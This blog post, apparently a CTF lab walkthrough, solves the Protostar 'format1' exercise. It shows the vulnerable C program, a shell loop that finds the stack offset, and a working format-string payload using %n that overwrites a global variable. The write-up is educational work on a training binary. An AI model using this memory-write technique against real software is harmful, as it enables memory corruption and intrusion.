Protostar exploits format1

Introduction

Protostar exploits are a cool bunch of ctf type exercises that focus on Linux  binary exploits that progressively get harder. A ISO containing the OS and challenges can be downloaded.

The website with all information and downloads is at https://exploit-exercises.com/protostar/

Challenge

Test run

user@protostar:~$ /opt/protostar/bin/format1 test
testuser@protostar:~$

Exploit

Program should print the message “you have modified the target :)”.

Hint from protostar:This level shows how format strings can be used to modify arbitrary memory locations.

Sounds like the $n format string modifier needs to be used to solve this challenge. This will write an integer to locations in the process’ memory

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
 printf(string);
 
 if(target) {
 printf("you have modified the target :)\n");
 }
}

int main(int argc, char **argv)
{
 vuln(argv[1]);
}

If we can assign the ‘target’ variable a none null value then the message should be printed.

Another hint from the challenge page is to use objdump -t option. This command will print the the binary’s symbol table. The symbol we want is the reference to the ‘target’ variable and it’s memory location.

user@protostar:~$ objdump -t /opt/protostar/bin/format1 |grep target
08049638 g O .bss 00000004 target

There we have it, ‘target’ should be located at memory address 0x08049638.

Now we need to construct the exploit format string payload.

First step is to figure out which position on the stack is the ‘string’ variable stored.

user@protostar:~$ for i in {1..254}; do echo -e "\n" && /opt/protostar/bin/format1 AAAA%$i\$p-$i;done |grep 0x41414141
AAAA0x41414141-134

I iterated from 1-254 to find the first part of the string of AAAA and it showed up at 134th position.

I tried to confirm this once more.

user@protostar:~$ /opt/protostar/bin/format1 `perl -e 'print "AAAA" . "%134\\$p"'`
AAAA0x3d4d5245user@protostar:~$

Oops it didn’t work.

I didn’t have time to investigate too much so I just decremented the position value till I found it again.

user@protostar:~$ /opt/protostar/bin/format1 `perl -e 'print "AAAA" . "%131\\$p"'`
AAAA0x41414141user@protostar:~$

The payload so far

AAAA%131$p

AAAA = start of the string parameter

%131 = Position on the stack that the ‘string’ (AAAA) variable is stored.

$p = This will print out the contents of the memory location at stack position 131.

All we need to do now is replace the AAAAs with the memory location of ‘target’ in reverse byte order and use the %n modifier to write to a memory location instead of printing the contents of the stack position. Something like \x38\x96\x04\x08%131$n

\x38\x96\x04\x08 = ‘target’ memory location in reverse byte order

%131 = Position on the stack that the ‘string’ (\x38\x96\x04\x08 ) variable is stored.

$n = Write the string length (4 ‘\x38\x96\x04\x08’) to the destination address specified by the stack position modifier %131

user@protostar:~$ /opt/protostar/bin/format1 `perl -e 'print "\x38\x96\x04\x08" . "%131\\$n"'`
8you have modified the target :)

It worked.

Thank you

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s